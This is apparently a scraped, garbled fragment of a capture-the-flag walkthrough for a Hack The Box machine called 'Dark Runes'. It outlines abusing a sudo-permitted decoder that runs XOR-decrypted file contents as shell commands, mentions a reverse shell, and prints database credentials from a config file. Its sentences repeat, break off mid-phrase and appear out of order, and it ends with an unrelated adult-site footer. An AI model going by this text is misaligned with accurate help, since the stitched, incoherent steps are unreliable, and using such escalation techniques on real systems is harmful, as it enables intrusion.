Htb — Dark Runes

It reads a file, XOR-decrypts it with a hardcoded key, then executes the output as a shell command if it starts with RUNECMD: . Create a malicious rune file:

Machine Difficulty: Medium Category: Web, Cryptography, Binary Exploitation, Linux htb dark runes

✅ RCE achieved. Get a reverse shell:

User flag: user.txt in /home/admin . Run sudo -l → (root) NOPASSWD: /usr/local/bin/rune_decoder /var/runes/* It reads a file, XOR-decrypts it with a

Land in /var/www/darkrunes . Find config.py with PostgreSQL creds: db_user: rune_walker , db_pass: s3cr3t_run3s . Access DB: It reads a file

@ 2025 PORNHD.SEX
All rights reserved.
All clips are collected from outside sources (pornhub.com, xvideos.com, redtube.com, youporn.com, tube8.fr,...). No videos are hosted on this server.If you have any legal issues please contact the appropriate media file owners or host sites.

© 2026 Vivid Sphere